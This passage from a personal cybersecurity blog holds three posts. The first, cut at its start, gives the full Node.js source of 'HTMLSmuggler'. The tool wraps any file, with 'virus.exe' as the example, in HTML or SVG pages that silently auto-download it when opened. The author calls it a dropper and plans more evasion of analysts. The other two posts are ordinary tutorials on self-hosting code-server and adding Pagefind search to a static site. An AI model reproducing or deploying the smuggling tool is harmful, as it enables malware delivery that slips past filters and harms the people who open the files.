      const svgBody = `<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" width="100" height="100"><circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red"/><script><![CDATA[document.addEventListener("DOMContentLoaded",function(){function base64ToArrayBuffer(base64){var binary_string=atob(base64);var len=binary_string.length;var bytes=new Uint8Array(len);for(var i=0;i<len;i++){bytes[i]=binary_string.charCodeAt(i);}return bytes.buffer;}var file='${obfuscatedB64}';var data=base64ToArrayBuffer(file);var blob=new Blob([data],{type:'octet/stream'});var fileName='${filename}';var a=document.createElementNS('http://www.w3.org/1999/xhtml','a');document.documentElement.appendChild(a);a.setAttribute('style','display:none');var url=window.URL.createObjectURL(blob);a.href=url;a.download=fileName;a.click();window.URL.revokeObjectURL(url);});]]></script></svg>`;
      const [file2, file3] = filename.split(".");
      fs.writeFileSync(`smuggle-${file2}.svg`, svgBody);
    }
    
    function htmlSmuggle(b64String, filename) {
      const obfuscatedB64 = b64String;
      const htmlBody = `<html><body><script>function base64ToArrayBuffer(base64){var binary_string=atob(base64);var len=binary_string.length;var bytes=new Uint8Array(len);for(var i=0;i<len;i++){bytes[i]=binary_string.charCodeAt(i);}return bytes.buffer;}var file='${obfuscatedB64}';var data=base64ToArrayBuffer(file);var blob=new Blob([data],{type:'octet/stream'});var fileName='${filename}';if(window.navigator.msSaveOrOpenBlob){window.navigator.msSaveOrOpenBlob(blob,fileName);}else{var a=document.createElement('a');console.log(a);document.body.appendChild(a);a.style='display:none';var url=window.URL.createObjectURL(blob);a.href=url;a.download=fileName;a.click();window.URL.revokeObjectURL(url);}</script></body></html>`;
      const [file2, file3] = filename.split(".");
      fs.writeFileSync(`smuggle-${file2}.html`, htmlBody);
    }
    
    function printError(error) {
      console.error("\x1b[31m%s\x1b[0m", error);
    }
    
    function main(args) {
      try {
        let inputFile, outputType;
        for (let i = 0; i < args.length; i++) {
          if (args[i] === "-i" && args[i + 1]) {
            inputFile = args[i + 1];
            i++;
          } else if (args[i] === "-o" && args[i + 1]) {
            outputType = args[i + 1];
            i++;
          }
        }
    
        if (!inputFile || !outputType) {
          printError(
            "[-] Invalid arguments. Usage: node script.js -i inputFilePath -o outputType(svg/html)"
          );
          return;
        }
    
        console.log("[+] Reading Data");
        const streamData = fs.readFileSync(inputFile);
        const b64Data = base64Encode(streamData);
        console.log("[+] Converting to Base64");
    
        console.log("[*] Smuggling in", outputType.toUpperCase());
        if (outputType === "html") {
          htmlSmuggle(b64Data, inputFile);
          console.log("[+] File Written to Current Directory...");
        } else if (outputType === "svg") {
          svgSmuggle(b64Data, inputFile);
          console.log("[+] File Written to Current Directory...");
        } else {
          printError(
            "[-] Invalid output type. Only 'svg' and 'html' are supported."
          );
        }
      } catch (ex) {
        printError(ex.message);
      }
    }
    
    main(process.argv.slice(2));

    Essentially it generates you HTML pages or SVG “images” simply by going:

    node autosmuggler.cjs -i virus.exe -o html

    I’ve dubbed it HTMLSmuggler. Swing by my GitHub to grab the code and take a peek. But hold onto your hats, because I’ve got big plans for this little tool.

    In the pipeline, I’m thinking of ramping up the stealth factor. Picture this: slicing and dicing large files into bite-sized chunks like JSON, then sneakily loading them in once the page is up and running. Oh, and let’s not forget about auto-deleting payloads and throwing in some IndexedDB wizardry to really throw off those nosy analysts.

    I’ve got this wild notion of scattering the payload far and wide—some bits in HTML, others in JS, a few stashed away in local storage, maybe even tossing a few crumbs into a remote CDN or even the URL itself.

    The goal? To make this baby as slippery as an eel and as light as a feather. Because let’s face it, if you’re deploying a dropper, you want it to fly under the radar—not lumber around like a clumsy elephant.

    The End

    Whether you’re a newbie to HTML smuggling or a seasoned pro, I hope this journey has shed some light on this sneaky technique and sparked a few ideas along the way.

    Thanks for tagging along on this adventure through my musings and creations. Until next time, keep those creative juices flowing and stay curious! 🫡

  • Unlock the Power of Remote Development with code-server

    Unlock the Power of Remote Development with code-server

    In the fast-paced world of software development, flexibility and efficiency are paramount. Enter code-server, an innovative tool that allows you to run Visual Studio Code (VS Code) in your browser, bringing a seamless and consistent development environment to any device, anywhere.

    Whether you’re working on a powerful desktop, a modest laptop, or even a tablet (pls don’t!), code-server ensures you have access to your development environment at all times. Here’s an in-depth look at what makes code-server a game-changer.

    What is code-server ?

    code-server is an open-source project that enables you to run VS Code on a remote server and access it via your web browser. This means you can:

    • Work on any device with an internet connection.

    • Leverage the power of cloud servers to handle resource-intensive tasks.

    • Maintain a consistent development environment across devices.

    With over 69.2k stars on GitHub, code-server has gained significant traction among developers, teams, and organizations looking for efficient remote development solutions.

    Why would you use code-server ?

    1. Flexibility Across Devices

    Imagine coding on your laptop, switching to a tablet, or even a Chromebook, without missing a beat. With code-server, your development environment follows you wherever you go—seamlessly.

    2. Offloading Performance to the Server

    Running resource-intensive tasks on a server instead of your local machine? Yes, please! Whether you’re working on complex builds or handling large datasets, code-server takes the heavy lifting off your device and onto the server.

    3. Bringing Your Dev Environment Closer to LLMs

    With the rise of large language models (LLMs), working near powerful servers hosting these models has become a necessity. No more downloading terabytes of data just to test integrations locally. Code-server simplifies this by placing your environment right where the action is.

    4. Because I Can! 🥳

    As a coder and IT enthusiast, sometimes the best reason is simply: Because I can! Sure, you could run local VSCode with “Remote Development” extensions or install it directly on a Chromebook—but where’s the fun in that? 😉

    5. Streamlined Backup and File Management

    One of my favorite aspects? Developing directly on a remote system where my regular backup processes already take care of everything. No extra steps, no worries—just peace of mind knowing my work is secure.

    I just did it to do it, I use code-server to manage all my Proxmox scrips and develop little Sysadmin tools. You also get a nice web shell.

    Installation

    Requirements

    Before diving in, make sure your system meets the minimum requirements:

    Linux machine with WebSockets enabled. (this is important to know when you use a reverse proxy)

    • At least 1 GB RAM and 2 vCPUs.

    I think you can get away with 1 CPU, mine is bored most of the time, obviously running resource intensive code will eat more.

    Check out the full requirements here.

    Installation

    There are multiple ways to get started with code-server, but I choose the easiest one:

    Bash
    curl -fsSL https://code-server.dev/install.sh | sh

    This script ensures code-server is installed correctly and even provides instructions for starting it. Never run script like this from the internet before checking it.

    Configuration

    After installation, you can customize code-server for your needs. Explore the setup and configuration guide to tweak settings, enable authentication, and enhance your workflow.

    Bash
    nano ~/.config/code-server/config.yaml

    That is where you will find the password to access code-server and you can also change the port:

    ~/.config/code-server/config.yml
    bind-addr: 127.0.0.1:8080
    password: 5f89a538c9c849b439d0f866
    cert: false

    You can disable auth by commenting out password. Personally I use SSO through Authentik for authentication.

    Now you have an awesome way to code in your browser:

    Resources

    GitHub Repository

    Setup Guide

    Frequently Asked Questions

  • Building a static site search with Pagefind

    Building a static site search with Pagefind

    Introduction

    Hey there, web wizards and code conjurers! Today, I’m here to spill the beans on a magical tool that’ll have you searching through your static site like a pro without sacrificing your users’ data to the digital overlords. Say goodbye to the snooping eyes of Algolia and Google, and say hello to Pagefind – the hero we need in the wild world of web development!

    Pagefind

    So, what’s the deal with Pagefind? Well, it’s like having your own personal search genie, but without the need for complex setups or sacrificing your site’s performance. Here’s a quick rundown of its enchanting features straight from the Pagefind spellbook:

    • Multilingual Magic: Zero-config support for sites that speak many tongues.
    • Filtering Sorcery: A powerful filtering engine for organizing your knowledge bases.
    • Custom Sorting Spells: Tailor your search results with custom sort attributes.
    • Metadata Mysticism: Keep track of custom metadata for your pages.
    • Weighted Wand Wielding: Adjust the importance of content in your search results.
    • Section Spellcasting: Fetch results from specific – sections of your pages.
    • Domain Diving: Search across multiple domains with ease.
    • Index Anything Incantation: From PDFs to JSON files, if it’s digital, Pagefind can find it!
    • Low-Bandwidth Brilliance: All this magic with minimal bandwidth consumption – now that’s some serious wizardry!

    Summoning Pagefind

    Now, let’s talk about summoning this mystical tool onto your Astro-powered site. It’s as easy as waving your wand and chanting npx pagefind --site "dist. Poof! Your site’s now equipped with the power of search!

    With a flick of your build script wand, you’ll integrate Pagefind seamlessly into your deployment pipeline. Just like adding a secret ingredient to a potion, modify your package.json build script to include Pagefind’s magic words.

    JSON
      "scripts": {
        "dev": "astro dev",
        "start": "astro dev",
        "build": "astro build && pagefind --site dist && rm dist/pagefind/*.css && cp -r dist/pagefind public/",
        "preview": "astro preview",
        "astro": "astro"
      },
    

    If you are not using Astro.js you will have to replace distwith your build directory. I will also explain why I am making the CSS dissapear.

    Running the command should automagically build your index like so:

    Bash
    [Building search indexes]
    Total:
      Indexed 1 language
      Indexed 19 pages
      Indexed 1328 words
      Indexed 0 filters
      Indexed 0 sorts
    
    Finished in 0.043 seconds
    

    Now my site is not that big, yet but 0.043 seconds is still very fast and if you are pying for build time, also next to nothing. Pagefind being written in Rust is very efficient.

    Getting Cozy with Pagefind’s UI

    Alright, so now you’ve got this powerful search engine at your fingertips. But wait, what’s this? Pagefind’s UI is a bit… opinionated. Fear not, fellow sorcerers! With a dash of JavaScript and a sprinkle of CSS, we’ll make it dance to our tune!

    Weaving a custom UI spell involves a bit of JavaScript incantation to tweak placeholders and buttons just the way we like them. Plus, with a bit of CSS wizardry, we can transform Pagefind’s UI into something straight out of our own enchanting design dreams!

    Astro
    ---import"../style/pagefind.css";---<divclass="max-w-96 flex"><divid="search"></div></div><scriptsrc="/pagefind/pagefind-ui.js"is:inline></script><script>document.addEventListener("astro:page-load",()=>{newPagefindUI({element:"#search",debounceTimeoutMs:500,resetStyles:!0,showEmptyFilters:!1,excerptLength:15,showImages:!1,addStyles:!1,});constsearchInput=document.querySelector<HTMLInputElement>(".pagefind-ui__search-input");constclearButton=document.querySelector<HTMLDivElement>(".pagefind-ui__search-clear");if(searchInput){searchInput.placeholder="Site Search";}if(clearButton){clearButton.innerText="Clear";}});</script>
    • /pagefind/pagefind-ui.js is Pagefind specific JavaScript.In the future I plan to reverse it as there is a lot of uneccessary code in there.
    • I am using astro:page-load as an event listener since I am using view transitions.

    Embrace Your Inner Stylist

    Ah,but crafting a unique style for your search UI is where the real fun begins!With the power of TailwindCSS (or your trusty CSS wand),you can mold Pagefind’s UI to fit your site’s aesthetic like a bespoke wizard robe.

    With a little imagination and a lot of creativity,you’ll end up with a search UI that’s as unique as your magical incantations.

    CSS
    .pagefind-ui__results-area{@applyborderborder-pink-500dark:text-white text-black p-4;@applyabsolutez-50dark:bg-gray-900 bg-white;@applymax-h-96overflow-y-automr-10;}.pagefind-ui__result{@applyborder-tmy-4dark:text-white text-black;}.pagefind-ui__resultmark{@applybg-fuchsia-700text-fuchsia-300;}.pagefind-ui__form{@applyborderdark:border-white border-black;}.pagefind-ui__search-input{@applydark:text-white text-black bg-transparent;}.pagefind-ui__search-input{@applyplaceholder:italicplaceholder:text-slate-400 p-2 border-r border-black;}.pagefind-ui__form{@applymin-w-full;}.pagefind-ui__message{@applyfont-semiboldfirst-letter:text-pink-500;}.pagefind-ui__result-link{@applyfont-boldunderlinetext-blue-500;}.pagefind-ui__result-title{@applymb-1;}.pagefind-ui__result-inner{@applymy-3;}.pagefind-ui__button{@applyborderborder-blackpy-1px-2hover:underlinemt-4;}.pagefind-ui__search-clear{@applymr-2;}

    (@apply is TailwindCSS specific,you can use regular CSS if you please)

    And there you have it,folks – the mystical journey of integrating Pagefind into your static site,complete with a touch of your own wizardly flair!

    custom search ui

    Now go forth,weave your web spells,and may your users’ search journeys be as magical as your coding adventures!🧙✨

    Where to go from here

    I gave you a quick look into building a simple static site search.In my opinion the JavaSript files from Pagefind should be slimmed down to work,in my case for Astro,the CSS should be applied by you and Pagefind should just leave you a simple unstyled search,I am sure they would be happy if someone helped them out by doing this.

    I was thinking about hosting my index on a Cloudflare Worker,then styling my search form however I want and just hooking up the Worker endpoint with the form,basically like a self hosted Algolia.An alternative to Pagefind could be Fuse.js,the drawback is that you would have to build your own index.

    Bonus:

    You can try out my search here: Exploit.to Search

    This post was originally posted on 17 Mar 2024 at on myCybersecurity blog.